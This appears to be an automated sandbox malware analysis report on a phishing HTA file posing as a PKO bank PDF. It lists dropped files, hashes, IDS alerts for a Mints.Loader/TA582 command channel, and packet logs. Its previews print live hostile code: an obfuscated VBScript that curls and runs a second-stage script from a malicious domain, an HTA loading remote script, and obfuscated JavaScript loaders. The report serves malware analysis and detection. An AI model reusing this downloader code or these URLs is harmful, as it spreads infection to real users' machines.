                                                                                                                            Preview:acosvb.txt.acvixr.txt.adimqh.txt.advkwe.txt.aehois.txt.agnprl.txt.ahtkco.txt.ajmdxh.txt.ajykuv.txt.alzcqd.txt.aolwzh.txt.aowqks.txt.apinhw.txt.apybvd.txt.aucjpi.txt.aviloh.txt.avjbmt.txt.awrgeb.txt.axgkvf.txt.axtfwk.txt.axyohf.txt.ayojtr.txt.bckimf.txt.bedskm.txt.bfmstk.txt.bgkluf.txt.bhrsok.txt.bjenhx.txt.bkuhcj.txt.bmkvfo.txt.bmntfc.txt.bnfpjq.txt.bnsqhl.txt.boctsi.txt.bqagtw.txt.brivej.txt.brmcuo.txt.brvcon.txt.bsuxni.txt.bsyhel.txt.buersl.txt.bvayux.txt.bvtnxg.txt.bwjsde.txt.bwqztc.txt.bynwiz.txt.cdfoxq.txt.cdsrne.txt.cenzsh.txt.cfvedw.txt.cgemlk.txt.chzwis.txt.cihlkf.txt.cjdams.txt.ckjhao.txt.cmhniy.txt.cmkovg.txt.cnowez.txt.codneq.txt.ctyhds.txt.cuzyrn.txt.cvbrkt.txt.cwalbf.txt.cwmist.txt.cwrqlj.txt.cwuspz.txt.cyuwxm.txt.czoahi.txt.dcswua.txt.dfzirc.txt.dimxvb.txt.djcuar.txt.djugez.txt.dkauol.txt.dlerac.txt.dnujfr.txt.dnyaje.txt.dpygbo.txt.dqetif.txt.drawbz.txt.dxvzfu.txt.dyvnzc.txt.dzlgtx.txt.eajylz.txt.eakigy.txt.eaojfc.txt.ebqkmv.txt.efznhl.txt.einfto.txt.ejorqk.txt.ejycbr.txt

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\riodfc[1].txt

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (1850)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):247500
                                                                                                                            Entropy (8bit):4.771099595783964
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:nUxcPd/ESk7zDZ9xcWd/ESk7zDZKd/ESk7zDZpbxcSxcd:D1W7zOiW7zIW7zfKBd
                                                                                                                            MD5:6CF9303C43CA796B3D7C7E018D3067A9
                                                                                                                            SHA1:8BB9AD339FF666981D423664123EFA361A398D17
                                                                                                                            SHA-256:5D2E9A6FBE99CB9E90C513561AC6351D5C7E59582456318FAE3A38ED1CF91E5F
                                                                                                                            SHA-512:E1A3662A087E802A5528AFADFD8291DE12481026D1BD8F8D0D125D9857753B7596BF1797668B88EF9E4C36678F82B719A2747E7148CB175E512672062D45C4E4
                                                                                                                            Malicious:false
                                                                                                                            Preview:var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\676198543e2f1[1].vbs

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):709
                                                                                                                            Entropy (8bit):5.45619524033301
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:ab1ydJWCH4AddYN1dPw0rZfHFXZ3ssFU8ZfzjqH6:ab1ydzH4witw0rFHDFFT
                                                                                                                            MD5:BB3BB1EF9ADF8446185D4DF8B13F869F
                                                                                                                            SHA1:44DCB274A64FAAEAB2F65BE68B5A122EA8B56F77
                                                                                                                            SHA-256:49563E3F972D6A04230C3AAE0E5CB943A3938E318B326F3E06A121A5B617BAC4
                                                                                                                            SHA-512:EBBAC6179B1DA3499D8E7EF6A81B611C37338D42578B3B62A620FE02D0C6EAF17679D501A816C61D8F701F27556A98DF211C74626697519BF7D21E04E22D87AB
                                                                                                                            Malicious:true
                                                                                                                            Preview:..function pVvId92(vHkR3pm51) . pVvId92 = Replace(vHkR3pm51,"|", "").end function..Dim shell, publicFolder.Set shell = CreateObject("WScript.Shell").publicFolder = shell.ExpandEnvironmentStrings("%PUBLIC%")...Dim vbsFilePath.vbsFilePath = publicFolder & "\" & "676198543e2f3.vbs"...CreateObject(pVvId92("|W|s|c|r|I|p|t.|s|h|E|l|l|")).Run pVvId92("cmd /V/D/c curl -k -o " & vbsFilePath & " https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs"), 2, TRUE...CreateObject(pVvId92("||W|s|c|r|I|p|t.|s|h|E|l|l|")).Run pVvId92("cmd /V/D/c start " & vbsFilePath), 2, TRUE..CreateObject(pVvId92("||W|s|c|r|I|p|t|.|s|h|E|l|l")).Run pVvId92("cmd /V/D/c start " & vbsFilePath), 2, TRUE.close.close.close

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):64
                                                                                                                            Entropy (8bit):1.1510207563435464
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:NlllulBkXj:NllUS
                                                                                                                            MD5:453075887941F85A80949CDBA8D49A8B
                                                                                                                            SHA1:7B31CA484A80AA32BCC06FC3511547BCB1413826
                                                                                                                            SHA-256:84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8
                                                                                                                            SHA-512:02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e................................................@..........

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kameenv4.s2i.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_novyqydl.gxx.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nthq51ec.qlk.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tsliokru.s4g.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\pmxdhq.js

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            File Type:ISO-8859 text, with very long lines (1724)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):232850
                                                                                                                            Entropy (8bit):4.785235864866798
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:nwL1ugGm3HT+xTSZ82VZYLkLb9kugGm3HT+xTSZ8AVZYLkLb9iVZYLkLb9qugGm3:no6AC6mq46K6A
                                                                                                                            MD5:34F62C31512FA8C10BC9AA9AE31564B5
                                                                                                                            SHA1:850FC059A49D1F8DBDDE87746509DA4EC6E18B68
                                                                                                                            SHA-256:E8471484582EDAC57AC7C8F6879B90A591CAC271B77E7C0F84218CA20D589F89
                                                                                                                            SHA-512:BA29527897566B25FCB1BD1804BCA25BFE0E28447AAC4FD61FBF7D2660591C1AE33D19DC76BB71689ABDA972FA3DCC10173D79D9A8CB2285F1363A5971859423
                                                                                                                            Malicious:false
                                                                                                                            Preview:var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1

                                                                                                                            C:\Users\user\AppData\Local\Temp\riodfc.js

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            File Type:ISO-8859 text, with very long lines (1850)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):247474
                                                                                                                            Entropy (8bit):4.7700607316099655
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:n1xvXd/Etk7zDZKxvyd/Etk7zDZFd/Etk7zDZpQxvYxv6:XNz7zKez7zxz7zf2e6
                                                                                                                            MD5:854913C5255634F504DAEB57645DC0AB
                                                                                                                            SHA1:66A9073BEA82E6728CA8AB20B1197717A8F29098
                                                                                                                            SHA-256:243B523C7B864218A381F8BC1DBD0C9DF6F9C093E0A66977ECAC5046ADBF7FDE
                                                                                                                            SHA-512:BCD2D19FDCE680281A51133F9536AD96A687021C1B8AB5BA6122039F77CD7F64DCC6C61A842A02F00650068464B7EAF3FF98E88C8157B088F398C3CF6E2E55F3
                                                                                                                            Malicious:true
                                                                                                                            Preview:var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1

                                                                                                                            \Device\ConDrv

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\curl.exe
                                                                                                                            File Type:ASCII text, with CR, LF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):478
                                                                                                                            Entropy (8bit):3.147272201788366
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdivIdaI8gFAw:Vz6ykymUexb1U9cdd/8Yz
                                                                                                                            MD5:D8DFA07944C35960CD48BC58B49CA379
                                                                                                                            SHA1:94D9271AAD528E5AE040BE77731970A2A8BDD570
                                                                                                                            SHA-256:FC871CFF6AE5DBC541B00307791ECB41316C803B06D535BDE51D027C63C5E2D9
                                                                                                                            SHA-512:953A13D28C3741D1AEAACBA19E70284DD9DBFE2F303C8C460BB464C912FDE8CAA8FAF7A9868831D22E94737E4545E3073BF863F5A19430E807CDE64E7CC79804
                                                                                                                            Malicious:false
                                                                                                                            Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0.100 1928 100 1928 0 0 869 0 0:00:02 0:00:02 --:--:-- 870.100 1928 100 1928 0 0 824 0 0:00:02 0:00:02 --:--:-- 825..

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:HTML document, ASCII text
                                                                                                                            Entropy (8bit):5.047836866900538
                                                                                                                            TrID:
                                                                                                                            • HyperText Markup Language (12001/1) 66.65%
                                                                                                                            • HyperText Markup Language (6006/1) 33.35%
                                                                                                                            File name:PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta
                                                                                                                            File size:138 bytes
                                                                                                                            MD5:8da85c61d9b033c0c6b99452a4d66976
                                                                                                                            SHA1:bf2e95e2c7d9e3690fcb323daefaba311021cea6
                                                                                                                            SHA256:0f2b38a3af80d5eb72b72f5b5dfe2e57d155608e64ec79f03b4ec58f81a851bc
                                                                                                                            SHA512:2c1a86fea21a2b952d114db9bd4bada11e90d231a026ce203a2f4e43ef733aeabde0d149da49082a95f04a1781550e8b6cbc9bc420eb30d54cfe538e5cd8772b
                                                                                                                            SSDEEP:3:qVvzLDLvBDJlbpLOdcMuKpRcPWRNGXIL0NhtvxL0Hac4NGb:qFzLPvB7bpL+FJNV4Nhdx434Qb
                                                                                                                            TLSH:4EC09BDB6C46D2056554945C545DE6444413635D04E1C5C0D6F4D0FB79109578D471A9
                                                                                                                            File Content Preview:<html>.<head>.<script src="https://pko-download.kagyouth.co.ke/676198543e20a/js/676198543e135.js"></script>.</head>.<body>.</body>.</html>

                                                                                                                            Network Behavior

                                                                                                                            Suricata IDS Alerts

                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                            2024-12-17T16:30:22.996815+01002057063ET MALWARE Mints.Loader CnC Activity (GET)1192.168.2.449748193.149.129.6180TCP
                                                                                                                            2024-12-17T16:30:22.996815+01002057743ET MALWARE TA582 CnC Checkin1192.168.2.449748193.149.129.6180TCP
                                                                                                                            2024-12-17T16:30:23.043711+01002057063ET MALWARE Mints.Loader CnC Activity (GET)1192.168.2.449749193.149.129.6180TCP
                                                                                                                            2024-12-17T16:30:23.043711+01002057743ET MALWARE TA582 CnC Checkin1192.168.2.449749193.149.129.6180TCP

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 17, 2024 16:30:03.822509050 CET49730443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:03.822622061 CET4434973045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:03.822783947 CET49730443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:03.837464094 CET49730443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:03.837500095 CET4434973045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:05.232812881 CET4434973045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:05.233035088 CET49730443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:05.289936066 CET49730443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:05.290016890 CET4434973045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:05.290462971 CET4434973045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:05.290539980 CET49730443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:05.294985056 CET49730443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:05.335331917 CET4434973045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:05.755601883 CET4434973045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:05.755696058 CET4434973045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:05.755716085 CET49730443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:05.755764961 CET49730443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:05.757499933 CET49730443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:05.757528067 CET4434973045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:05.776093960 CET49731443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:05.776151896 CET4434973145.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:05.776273966 CET49731443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:05.776514053 CET49731443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:05.776529074 CET4434973145.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:07.141202927 CET4434973145.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:07.141341925 CET49731443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:07.141871929 CET49731443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:07.141880035 CET4434973145.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:07.142158985 CET49731443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:07.142162085 CET4434973145.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:07.651420116 CET4434973145.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:07.651506901 CET4434973145.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:07.651612043 CET49731443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:07.658201933 CET49731443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:07.658229113 CET4434973145.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:08.478698969 CET49737443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:08.478760958 CET4434973745.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:08.478866100 CET49737443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:08.487827063 CET49737443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:08.487868071 CET4434973745.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:09.993063927 CET4434973745.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:09.993253946 CET49737443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:09.994678020 CET49737443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:09.994697094 CET4434973745.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:09.994916916 CET4434973745.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:09.999064922 CET49737443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:10.043333054 CET4434973745.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:10.503185034 CET4434973745.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:10.503216028 CET4434973745.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:10.503285885 CET4434973745.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:10.503295898 CET49737443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:10.503456116 CET49737443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:10.909082890 CET49737443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:10.909113884 CET4434973745.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:12.283777952 CET49739443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:12.283823013 CET4434973945.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:12.284111977 CET49739443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:12.336417913 CET49739443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:12.336453915 CET4434973945.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:12.823901892 CET49740443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:12.823945999 CET4434974045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:12.824065924 CET49740443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:12.895998955 CET49740443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:12.896017075 CET4434974045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:13.737132072 CET4434973945.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:13.737222910 CET49739443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:13.742162943 CET49739443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:13.742196083 CET4434973945.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:13.742465973 CET4434973945.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:13.742651939 CET49739443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:13.744553089 CET49739443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:13.787339926 CET4434973945.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.247628927 CET4434973945.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.247653008 CET4434973945.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.247710943 CET4434973945.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.247726917 CET49739443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.247778893 CET49739443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.250150919 CET49739443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.250191927 CET4434973945.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.259439945 CET4434974045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.259601116 CET49740443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.265554905 CET49740443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.265566111 CET4434974045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.265824080 CET4434974045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.266007900 CET49740443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.274614096 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.274648905 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.274755955 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.276660919 CET49740443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.276797056 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.276808023 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.319336891 CET4434974045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.865076065 CET4434974045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.865108013 CET4434974045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.865161896 CET49740443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.865170956 CET4434974045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.865267992 CET49740443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.874006033 CET49740443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.874027967 CET4434974045.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.904912949 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.904953957 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:14.905910015 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.906141043 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:14.906152964 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:15.663398981 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:15.663458109 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:15.664253950 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:15.664263964 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:15.664587975 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:15.664592028 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.173677921 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.173708916 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.173770905 CET49742443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:16.173785925 CET4434974245.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:16.173835993 CET49742443192.168.2.445.11.180.77
